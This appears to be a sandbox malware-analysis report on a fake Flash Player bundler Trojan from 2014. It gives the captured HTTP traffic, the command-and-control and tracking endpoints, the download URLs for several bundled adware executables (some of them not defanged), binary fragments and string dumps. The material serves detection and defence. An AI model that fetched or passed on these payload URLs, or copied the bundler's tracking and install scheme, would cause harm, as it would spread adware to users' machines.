from=wrapper&type=wrapper&pubid=12872&CbId=9342&mgu=rQXmyP8qC9u3BiBIkZpmYbQ5qfySo1gEw8LbZb2D3XAwsHEqmZsEVA==&subid=&mid=qGKynuZ0mulXtjqK50UfpKXXmVfPsDsc&wlc=1
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:49 GMT
Server: Apache/2.2.23 (CentOS)
X-Powered-By: PHP/5.3.28
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
POST /DSS_IMapplication_mon_NV1_2.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.stsunsetwest.com
Content-Length: 336
Connection: Keep-Alive
Cache-Control: no-cache
from=wrapper&type=wrapper&vid=3&pubid=12872&CbId=9342&mgu=rQXmyP8qC9u3BiBIkZpmYbQ5qfySo1gEw8LbZb2D3XAwsHEqmZsEVA==&subid=&lid=EN&mid=qGKynuZ0mulXtjqK50UfpKXXmVfPsDsc&advDetails=38~YES~0/145~YES~0/176~YES~0/226~YES~0/234~YES~0/235~YES~0/270~YES~0/239~YES~0/243~YES~0/251~YES~0/260~YES~0/275~YES~0/277~YES~0/283~YES~0/291~YES~0/301~NO~4//
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:39 GMT
Server: Apache/2.2.23 (CentOS)
X-Powered-By: PHP/5.3.28
Content-Length: 927
Connection: close
Content-Type: text/html; charset=UTF-8
243~hXXp://cdn.cmatecdnfast.us/os/OfferScreen_243_FP_spws243.zip~https://sp-storage.spccinta.com/sp-downloader.exe~hXXps://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~hXXp://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~hXXp://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~hXXp://wajam-download.com/download/wajam_download_v2.exe~hXXp://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~hXXp://VVV.reghelper.com/rh/RegistryHelperSetupIM.exe~hXXp://VVV.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~hXXp://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0..
GET /install/valid?v=1&unique_id=0630F6DB1811B361E367028BD09FCCEB HTTP/1.1
Host: VVV.wajam.com
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:39 GMT
Server: Apache
Set-Cookie: PHPSESSID=shf3uases3advt3l3998fno5n0; path=/; domain=.wajam.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _wau=14071530396341834; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Set-Cookie: _wal=1407153039; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Set-Cookie: not_logged_unique_id=0630F6DB1811B361E367028BD09FCCEB; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Set-Cookie: _waab=48,31,99,55,52,48,40,63,72,2; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Set-Cookie: not_logged_unique_id=0630F6DB1811B361E367028BD09FCCEB; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Set-Cookie: _wal=1407153039; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Set-Cookie: not_logged_unique_id=0630F6DB1811B361E367028BD09FCCEB; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Set-Cookie: _wal=1407153039; expires=Tue, 04-Aug-2015 11:50:39 GMT; path=/; domain=.wajam.com
Vary: Accept-Encoding
Content-Length: 1
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: APPSESSID=w18|U99zk|U99zk; path=/; domain=.wajam.com
0..
GET /nsi/nsis-html/WS_Flash___Click_To_Safe_Install___________________________MA_02_9342.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secure.goeastcdncache.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:39 GMT
Server: PWS/8.0.25
X-Px: ms h0-s2014.p9-jfk ( h0-s2028.p9-jfk), ht-d h0-s2028.p9-jfk.cdngp.net
ETag: "2c31b1-4f28-4fc460c2c9040"
Cache-Control: max-age=604800
Expires: Tue, 05 Aug 2014 12:55:07 GMT
Age: 514532
Content-Length: 20264
Content-Type: application/zip
Last-Modified: Fri, 20 Jun 2014 15:21:29 GMT
Connection: keep-alive
PK...........Bh=.r5...2 ......but1.png}yeP................2........!.........\.,!.38$...s.=.{.......k...w...1Z.JxO)....<...:.f.?=....XH...3Qx).zA...|.<...[7k(....=T.je..>.......u.....Dm.\y.........5q)_...3....j...`<..e.w..`4.P.U..A.._.{@!...6..6"..R........B...}]]`....... .g....H./.......2T...s......r......................@@^!n>^Q.!Q^>..4.?.y..... .g.?......\..........y...DDD.. .............y2..A..i....rt...e[Y.y{I02.}.W....<.S.?...Z..|<....TW......E{z.@..o........z.y{...8;...pQ9...........U.rp.r.tp...A.x....a.n>......*.<..`6Pey..?..GG[Q.........<H..O.$........).........w..v..........?r.....P..WP[E.7W...Y...s...\.....\.........]...?..k._..1. |(...=..:G.L....U....]:2...*.=N.M..f.Z...9...>k....}/_......>ag..[.W.....g..Pv..g/.u........9...r....z.~<...N]=.N..D].a..... ..O.=.z....Ni...$..'-n\....nD...f.../.......T.W.-.%{i....Cn..B\3Nws......:.h.j.J.L.A.\Y..~.7U..........=).... ....|.I...V.........'v....7X.M....U*RWw.4...0..75.k$y.g...Oi...A.?IL.Pp1.p_...V......._....g7.....%..!"..W.!..lK~.\..pQ..P=.GQ..C...5.T..C....`=b|..>b...O...V..B."j.?PCL..r.Y?..>=.SG.v.......U.q...aX..W..[..E.....= ...ws........@...8oz.I.....j.. /."@...h... ...p.jZ....Wyq...t..B..@r..%..6..w........VIus..d...LxE}..-.2B..A.@o...V.......]...0.^?......\....m..Q:G..s...L......&@.P.'...6.. .W..,.!y.F.V.o....U.8..Y.........~..N|..Cq..{J..Q%..%..(.c.]n.H.Ik.A.i.@C#.}"...I.....o.j.n...G......0.W...N......U.o..q..s$.h.zz-gdl......p.........5_.X.....6...)v......U*..}...Wk....%GL....EV..rV...O....m.....w'.
<<< skipped >>>
GET /BrandingImages/BI_Flash___Click_To_Safe_Install___________________________MA_02_9342.jpg HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secure.goeastcdncache.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:39 GMT
Server: PWS/8.0.25
X-Px: ms h0-s2014.p9-jfk ( h0-s2012.p9-jfk), ht-d h0-s2012.p9-jfk.cdngp.net
ETag: "4a278a-b46-4fc460c25d05d"
Cache-Control: max-age=604800
Expires: Sat, 09 Aug 2014 01:58:28 GMT
Age: 208331
Content-Length: 2886
Content-Type: image/jpeg
Last-Modified: Fri, 20 Jun 2014 15:21:28 GMT
Connection: keep-alive
....\.kwh.LV.......LI....n...E.8...........,....Ll............\..Q.{...f..=X\........8R[...)@...(...Rj...M ....qH....i.c}ri..1f.....9..?.egQ."...R...E6..&...#c...I..L...N... ...%B.O)3Xb:gN.....J....R.6..........Yh._D...8....I.<.)..4.....h....n.h..L.s.2$g......<g.`..ST.(sJ.T.......pZR.. .......}...........m"e*#..H<Z...|.o|LY.d..9.z.O..Y.}..o..."n.M.5...v...a......BR..N.H.$..D.......v..O...0.....t..g..<Q.!..{.D9M.8....&J..ZgU..wUa2..[.....d.YJ^x.V.J.........i.Dz.L.?...%...........I@.\{R$..<..._|.g|LX.f..9.z.O....}........E3..M...E. .A..<d..k...q.)*g..Gk.....s....-.i../...........u.R.......Exif..II*.................Ducky.......<.....)hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:01C2A6FFF88911E3996AB6FAF4E4B048" xmpMM:DocumentID="xmp.did:01C2A700F88911E3996AB6FAF4E4B048"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:01C2A6FDF88911E3996AB6FAF4E4B048" stRef:documentID="xmp.did:01C2A6FEF88911E3996AB6FAF4E4B048"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....
<<< skipped >>>
GET /os/OfferScreen_243_FP_spws243.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cdn.cmatecdnfast.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:40 GMT
Server: PWS/8.0.25
X-Px: ms h0-s2070.p9-jfk ( h0-s2026.p9-jfk), ht-d h0-s2026.p9-jfk.cdngp.net
ETag: "2809b9-7b3c-4fa11b41c8a80"
Cache-Control: max-age=604800
Expires: Wed, 06 Aug 2014 20:34:43 GMT
Age: 400557
Content-Length: 31548
Content-Type: application/zip
Last-Modified: Fri, 23 May 2014 14:04:10 GMT
Connection: keep-alive
PK........ ..D.K.......7......OfferScreen_243.html.[.n.9..=.....:.{\..e[..A.$3Y$.l..... ..(...bu...1z......}.~.=....$;.X,..-.H..w.dU..y......o.L.........0.o....i....a?.............u,S..Zo...7.:..Z..2X...O[w..VH....G_WV...........'...B.3...r3Y....Bs..}.."~..nd.E...u&<..o... ...#..x...\......V2.o.fb.n.<.:.'UZk.........~.....L.:.W.S.y.............E...,.....-...eod...q.mk.o,.5{dc..Os.H...wm|....{......8....GQ.N.f,.-...I._#6..t..g...\y..X...A;[.......#..;pQ.$....~F,..=.#.-3$@.3...D....60.......<a. ......<..1..H...C~..@.W".'# ...%.T..)s....#...#n.....8.#Vr..R....EQ.....q.3.q".{ .X&......}..3.k....Y.-E..Q.@-......>......[....\..`.@..".W......a..Z.|.h8M...pZ.[..2............O..H.......13O.i:..."..e.....9i....<G..._..!.0..x.$B....G,.~.2.5...3.KH...I. .X..L #....Vp....Bh..8..k..b...}.M:....6tw.K..~.Pm...,... ..`..y.....|.y.{8....f.N..>.\%"i..L..........9....s02y"%.*.>....9kg G...j...X$..).f.x.............D.......9.gr.Gdo....A.ade<..... .r..Z.....A1....8.D:..8......Xj-...l...H.>.)h.......x...c..m.O..i2.x..R.X...D....7..&.8....4T.K/.Pl..>.h$b.oJH.P ;....PTD.....O..&..e........\.-...2..\.2..|..b...]6..Z..D...2.~....L..?..........1.u...|.v.T.6...L....r.\.L..c...Z..a7.c.......j...S.Re....[c...3....s......_..".ad.....f2..:..f2.].=.u._..JH.4.d<.A.U.k.1..B...7J..d..._`V.t...qK..*K.]......k......k.>.4. .k....M.1?...ky...n..F.l...v...;..;..............~..R&.Y.X=......>..$./b...r....vVfX.j.>...?..0.m..T.j%.....O.....|V...o..l`.D.H%..u.....c...9G..&..cw.@.5Z.j..Y.^..h...P......f....?..8
<<< skipped >>>
GET /os/js/OfferScreen_291_EN.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cdn.cmatecdnfast.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:40 GMT
Server: PWS/8.0.25
X-Px: ms h0-s2070.p9-jfk ( h0-s2077.p9-jfk), ht-d h0-s2077.p9-jfk.cdngp.net
ETag: "2805b3-4476-4fe4f7d9aa180"
Cache-Control: max-age=604800
Expires: Sun, 10 Aug 2014 22:07:25 GMT
Age: 49395
Content-Length: 17526
Content-Type: application/zip
Last-Modified: Wed, 16 Jul 2014 13:27:50 GMT
Connection: keep-alive
PK...........DI..l*...........trusted1.jpg.T_o.V............R...i...66(...hy.V...W.7.J." ..M...}.{.......U?@...).U.}....{...HW:.s...........[c......A.,d.....{t.(P$x...i|.....a"8..G...q.D".$.l........GO......9..^....J.h.../.b....=....<....... .P.p..8L.q....D..E..\...oL/.o.......... ..S..lJZS...%(.P..v.Jz..K...O.....k..\.u.YS..H.)....P.4Q.EYn..Fr.....&...&J...R....;..$..|.B...Y...V...w............(.'..........sY5...O>.slb.$@a.cvyr#x..kv[Q-..Q..%Ch...... }.1.<.u..b...I..2!..M5..f4e.J..n...0I..E9..s;..\}.#'.......<<.)N.q......=.C......U.b.;..1...}u..........r....."...n).NSj.3.w]....G.")F.2,..L.T....n.<($........f..........t...@i........&...A.X,...R..I...J.\Y.U...j..e..n.fn....w....666.m..ZZZZ...3...5v...e.....l..CVh.....Yj..|.(.\.j...........Ze..1.....U.....nA.....OP.)R....oO....T.....3P...L..j.P..z...JQ...z[..>.z.>E..=W.y.gs..._..;....9.Y.....PK.........a.Bh=.r4...2 ......but1.png}YuT.]..R.V.;........kh..$.S...F.........fhPi.......u.z.Y......9....~1Z.JxO)....<...:.f.?=....XH...3Qx).zA...|.<...[7k(....=T.je..>.......u.....Dm.\y.........5q)_...3....j...`<..e.w..`4.P.U..A.._.{@!...6..6"..R.......\.^V....0OQ_......Y...2.....,...I..k...y@..xx.mx.....y..yE.E^..x.x.| ..7.....(/.......<l.Du...}........\..........y...DDD.. .............y2.. ....p.{9.....[Y.y{I02.}.W..da.......}..@>.^.......PW...=.t.v.?.S.....@=..=l.<..._d........C.....*j9.y.y:.... .<|...0[7......E.a.^V0..............HD^AV@HV.$..........dx..D.eE.......x.Ba^.sm.. .......l... ..... .........mp..}f.u....00....E
<<< skipped >>>
GET /os/js/OfferScreen_38_EN.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cdn.cmatecdnfast.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:40 GMT
Server: PWS/8.0.25
X-Px: ms h0-s2070.p9-jfk ( h0-s2104.p9-jfk), ht h0-s2104.p9-jfk.cdngp.net
ETag: "2805fe-4546-4fe4f4fa61ac0"
Cache-Control: max-age=604800
Expires: Fri, 08 Aug 2014 22:45:56 GMT
Age: 219884
Content-Length: 17734
Content-Type: application/zip
Last-Modified: Wed, 16 Jul 2014 13:14:59 GMT
Connection: keep-alive
PK...........D...`.....N......OfferScreen_38.html.[ys.8..{R...0...#......]'vO..9&V.;.5......"8.hY..........{....v.]{.n..m[$...........7......,.......7,.{..v..z..s.....Wl...q.S-.T)Oz..w....d.^o.\v..]..z...;.5......fvc...O....w.$.'-t.GGGv..,x.?..p..C..B...oTjDj..*........;...#..y..9).4<.X.$..x.!......O.....X.7j.q#'..z.......$X..Td........Q8 ..4.8.L..I..?.*."../..q...Q.....w...5;WQ..F.w..O&*^.{6...,WE.......#...'.....g2......LgC.. .....>..................3.~......7HA.....x.U"c.<...K......Q....3v..D....>,6...S./x..@.7..Jg..I.. .[ad.;L..B-r9.....UK.*.H..#4`..H..q3..D..T.X.j.? ......K.%|5.)..'..n.g...l..k,..e.....GF.....H,...LV..o..G1..H#.....F*/.).o.f....J...dw.P....7.s.#.=....02Q...V..FV.<..t...D>bK...p0.[g...y..l0^....-7..H.a._..6KU..Lp.r\.Y..lJ.......k...Rod...<]_..B....E_NAG......t28B.8.B..v.#..)..._...!h)...e.3.e...-.~.....$...t:r....j^G......y.v.........w./F6...B../ZQ..............(.~...fX8..?."t..:d.s.%..n.....3|..|.-r.........FU~...Q....s..".9..^..!.i}0'jb.....%..k...]....C....cI..C.=).Q../....z~...|b.s.a.._.u-...nd.|.q<&..CS....o.3j.Y.=.1...ga.Yg2...O...I...i...- ..(e..D...........l.....*r.............|4.*`.X..Y&..k.L.2..........A..&.k......z....\`..../.......}...h....[.......=". <.I"....Et3Qw...: .I.D$>Ah.. k..e"..W...d.........6<..x.0-z.....L$b..`..0D...S7j..Rm.sS...........&6..\...,....} ..LeE.y... .....Z.'..~.9.s....".aM.t..{.u......~u..6.;..6.w.v;.5..%|..Hv(I.,L6@;b.......>..(....Y.....9?.Gm...# k...Q.z-3.}....l..W.0.b...]...}.4.........\.../.:.y)J...@..g............
<<< skipped >>>
GET /os/js/OfferScreen_235_EN.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cdn.cmatecdnfast.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:40 GMT
Server: PWS/8.0.25
X-Px: ms h0-s2070.p9-jfk ( h0-s2117.p9-jfk), ht h0-s2117.p9-jfk.cdngp.net
ETag: "2806b3-46ef-4fe4f609399c0"
Cache-Control: max-age=604800
Expires: Fri, 08 Aug 2014 17:31:06 GMT
Age: 238774
Content-Length: 18159
Content-Type: application/zip
Last-Modified: Wed, 16 Jul 2014 13:19:43 GMT
Connection: keep-alive
PK...........D,..ZQ...xP......OfferScreen_235.html.[{o.H..{..;.0.l2...#.-;..V&.u..%.l.......5.....5...5...r.I..../..Y....x&...z......7..../..l...}.}.99g........]....?.>].A..f9OU.#....._y.[i...z.......|........7.......:..=.vJ...8Ug;......v.X...'Bs..}..".?..e.E...&.....3O.....C..x..> ..?.X.$.q6.....v....i:[.D..$.:..@...j6...y.....7.^.GG....$.....I.4.cv.9.a.. ..w.=s.V).......t..dP$ (.....\.....<.[..H......3d.<....Jx.......0.......,...E...l%..J..}.=T;.f......~.@T..C.2.E~2..J.Q.^..g.b..'.HD......=.2....~..-..'............(.x.a.E|/t...S....y....(YV.S......:..E s.qs.@3..Q*..b...H......#..|s......2....e...._...0..}H.>..U..y 5...(..........E..6.2l.d~OR....k...........*.){l.g.G1z..I..2.\........<...I.Q'.![G.^....m..A.......<~...k.^....?g..,.~.2.5...3...).w.Q..c.....z.e;X..6.........c.t..w.u.X....&6....=........_."-|.R X.9....d%.A....|aA.........iU.;.Uw.....l.{....N.........d.....a..o....pp.....Q...-.62...co..D...~..X.......9.W2.C28.... .....&G.....^h9,....,o..'.(.E:..9...t...Rk...O..BJ........~.........2......E.=/.S..Ko...V. .....B..K..h.........\...ru...H..B......6..X...~..Nt..Y..KC-=.r.........>j......... .J.El.....h..4....ox]?.....}..E..<.J|.%..5O.z.(L.2.......T..^..L.?.. c&M.q._A.{.......q...d..ZT.>..#G2..T.[ X..n...?5l@Y....].P....9dT..(.. u......0@1.op...s......_.."."....1L.8kW..Xk..n.....o@.*WL..:A{.b.e.D.4.F........Q.B....;......Zrb....-*.`..t-.G.u.U.......k......\o.no.....O.......-.V....~....t.....u.x..w..9...x.f....5.9.._..."t#..j>...".....*........-6...b...Q....a.S..X*.. .#c..
<<< skipped >>>
GET /os/js/OfferScreen_145_EN.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: cdn.cmatecdnfast.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:40 GMT
Server: PWS/8.0.25
X-Px: ms h0-s2070.p9-jfk ( h0-s2080.p9-jfk), ht h0-s2080.p9-jfk.cdngp.net
ETag: "280655-544d-4fe4f54f42300"
Cache-Control: max-age=604800
Expires: Wed, 06 Aug 2014 05:02:51 GMT
Age: 456469
Content-Length: 21581
Content-Type: application/zip
Last-Modified: Wed, 16 Jul 2014 13:16:28 GMT
Connection: keep-alive
PK........Z..D........"N......OfferScreen_145.html.[.r.8......Z.T.].......-YR.m.. .I{... ...S...%k\]5...r.$s..@Q......?...I.88...@..O.ag.p.c.......m..JN....S.v'].....[V...$.a. _.<.V{.. -.....z...O 2.W'......bs............i..e.&W.../...r=Yp......g;./...*ud.D...&.%......O...[.].8..*U3......O.............d!..#..W.4.Z..`..L.J....dJ...9?o\8u.L.*...a.x....Xz...|)>\V. .J.......x...M..(.....Tz.....}..2.....5.m.._.....<..a..D...p..c..l..zV...[...P...........1....=...<"..{"n..a"..co\.i.@.T..D....m..gW.2n...`......x..V."..)Pj.>.....VB../....$".g- ./...C.......4.....:.x~..|......3...h....c.....[-.:..8.!;.$...H.....l.?......X..`c ..H.g....../..7S..I....D<,.W7.#.U....03.\5.";..."...?... K.-..=.h..gE.*n.......88.8....A T.{4?f.tb...X..1M|...pe...z.k.&.R....V...... kY.......DU...1:._.N...y.'.....UC......h....u.#feh..J.E.....x..8.....t..o.P....'o.I.....Y..........X.A..AT...Z.d..5...}#..?...w.v....c4.u..o..........S|!..E...0...@.E..D.,|.4-.,H.n.T.V&]..6.r.....D.2J9.\..Fv.R).l.GO....`...1..9..?....3.h...........v....b.$.../.r.;..a...T...J...Q...f..).r....4.....$.....y.s...B........I.......F.V.O.2.....O.C gF..:...R.?yK........H.D..[.. a..c|.jM..[..z..S....Ix..D.k.]..q*.J.....8.S.......M.\.Q6........UN..t8B.....=...?....*.....[..A0.#..U/F5.f.....^...m.H.F..i...|........M$.4*..x..p...@.`..Q...:.........H..|6..t.R...w.....Ls..Awmwr..]^B..'\.sB..-b\I.CY.bq..........f]W.o...*..,...G....8..._... E.....j.a..A.y..x...Y.. ......w@.?.......m:`.........2..MU....W.1c'f...j/...G....2O3.H3.a.E..f..MFX.=.=K?...\;..,G.t...p..V..F
<<< skipped >>>
POST /DS_wrapper_details_v2.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.stsunsetwest.com
Content-Length: 47
Connection: Keep-Alive
Cache-Control: no-cache
CbId=9342&&mid=qGKynuZ0mulXtjqK50UfpKXXmVfPsDsc
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:35 GMT
Server: Apache/2.2.23 (CentOS)
X-Powered-By: PHP/5.3.28
Content-Length: 476
Connection: close
Content-Type: text/html; charset=UTF-8
Flash Player~hXXp://secure.goeastcdncache.com/BrandingImages/BI_Flash___Click_To_Safe_Install___________________________MA_02_9342.jpg~EI~http://secure.ilandcachecdn.com/Advertisers/install_flashplayer11x32_mssd_aaa_aih.exe~$BrowserToPop~0~0~~hXXp://secure.goeastcdncache.com/nsi/nsis-html/WS_Flash___Click_To_Safe_Install___________________________MA_02_9342.zip~install_flashplayer11x32_mssd_aaa_aih.exe~hXXp://downloadupdates.in/MA1/flash_thankyou2.php~3C~1~1~1~~~~~0~0~~OW..
POST /FCL_Co_v4.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.fglasspeast.com
Content-Length: 180
Connection: Keep-Alive
Cache-Control: no-cache
from=wrapper&type=wrapper&vid=3&pubid=12872&CbId=9342&mid=qGKynuZ0mulXtjqK50UfpKXXmVfPsDsc&mgu=rQXmyP8qC9u3BiBIkZpmYbQ5qfySo1gEw8LbZb2D3XAwsHEqmZsEVA==&BundleVersionID=IM_210714@01
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:34 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 344
Connection: close
Content-Type: text/html; charset=UTF-8
hXXp://VVV.stsunsetwest.com/DSS_IMapplication_mon_NV1_2.php#hXXp://www.stsunsetwest.com/DS_trackstats_mon_v2.php#CA#hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.php#hXXp://VVV.stsunsetwest.com/DS_wrapper_details_v2.php#hXXp://VVV.wajam.com/download/wajam_validate.exe#38/145/176/184/226/234/235/270/239/243/251/260/275/277/283/291/301/320/339/..
GET /download/wajam_validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.wajam.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 11:50:35 GMT
Server: Apache
Last-Modified: Wed, 14 Aug 2013 20:48:34 GMT
ETag: "44414-2c00-4e3ee7b227727"
Accept-Ranges: bytes
Content-Length: 11264
Connection: close
Content-Type: application/x-msdos-program
X-Pad: avoid browser bug
Set-Cookie: APPSESSID=w5|U99zj|U99zj; path=/; domain=.wajam.com
Cache-control: private
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z~..;...;...;..D'...;../$...;../$...;../$...;..D3M..;...;...;../$...;../$...;..Rich.;..........PE..L...A..R.................0.......`.......p........@.................................................................................................................................................................................................UPX0.....`..............................UPX1.....0...p...&..................@...UPX2.................*..............@..............................................................................................................................................................................................................................................................................................................................................................................................................3.09.UPX!......X,)rA..u..."......&..b....U...E..@...M...U..._B..#Eg......A...........vT2.].?...%"....E.!..M.........?..k..n......}........j!...}w..Y.H.../.J....M..w.{..;s.LB......~.}.A.}..tq...B..@~..{k..@. fi.....w..{..U..P..Q M.L......Q.{<v...>.}..n?.X....*.. M.....R.{.u5P1.n...J..@..w.e......}.@|.>ns..f.Q)....&a.Z.R.7z.1....`..P.=/.k..*.Q.....3..`....Xa...t,aP...u.o..-MM...j@:.R.E.P]s..>.M..d.F..U..;|..E........onY.. ...}7X.3........3..B........I.......L.p......6.#....#...............x.j."B.a...4.X...!fu....'#U....?.....2<...
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1812:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
http://nsis.sf.net/NSIS_Error
http://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|<>/":
*?|<>/":
ShowWebInPage
ShowWebInPage
m\LOCALS~1\Temp\nsjB3.tmp\nsJSWV6.dll
m\LOCALS~1\Temp\nsjB3.tmp\nsJSWV6.dll
html.old
html.old
void collision with other applications and/or components; and (b) operate in a proxy configuration as part of the Software and the Services. Proxy is a server that acts as an intermediary for requests from clients seeking resources from other servers. If you wish to revert back such proxy configuration to its original state, you have to completely uninstall the Software or use the opt out option that will be provided to you by us within some of the Services; (c) once the Software is installed we may, now or in the future, use features or components to counter third party attempts to modify or replace your then-current proxy configuration without notifying you or get your permission to do so; Such third parties may include (without limitation) malicious programs and other harmful code that, in some cases, may compromise your system (collectively or in separate
void collision with other applications and/or components; and (b) operate in a proxy configuration as part of the Software and the Services. Proxy is a server that acts as an intermediary for requests from clients seeking resources from other servers. If you wish to revert back such proxy configuration to its original state, you have to completely uninstall the Software or use the opt out option that will be provided to you by us within some of the Services; (c) once the Software is installed we may, now or in the future, use features or components to counter third party attempts to modify or replace your then-current proxy configuration without notifying you or get your permission to do so; Such third parties may include (without limitation) malicious programs and other harmful code that, in some cases, may compromise your system (collectively or in separate
). You are hereby giving us your permission to use such features automatically without prior notification to you. Such features and components will act to protect your then-current proxy configurations, however we cannot guarantee 100% success and in no case we will be responsible for any Un-permitted Access or changes made to your system preferences or proxy configurations or to any damage that might have been caused to you due to Un-permitted Access; (d) periodically install automated updates to the Software on your computer as set forth in section 8; (e) place a small icon of the Software in your operating system
). You are hereby giving us your permission to use such features automatically without prior notification to you. Such features and components will act to protect your then-current proxy configurations, however we cannot guarantee 100% success and in no case we will be responsible for any Un-permitted Access or changes made to your system preferences or proxy configurations or to any damage that might have been caused to you due to Un-permitted Access; (d) periodically install automated updates to the Software on your computer as set forth in section 8; (e) place a small icon of the Software in your operating system
s icon tray, from which you will be able to launch the Website to switch on and off the operation of the Software, to change or update your preferences and account settings;<br />
s icon tray, from which you will be able to launch the Website to switch on and off the operation of the Software, to change or update your preferences and account settings;<br />
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB3.tmp\nsJSWV6.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB3.tmp\nsJSWV6.dll
dm\LOCALS~1\Temp\nsjB3.tmp\OfferScreen_145.html
dm\LOCALS~1\Temp\nsjB3.tmp\OfferScreen_145.html
OfferScreen_145.html.old
OfferScreen_145.html.old
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB3.tmp
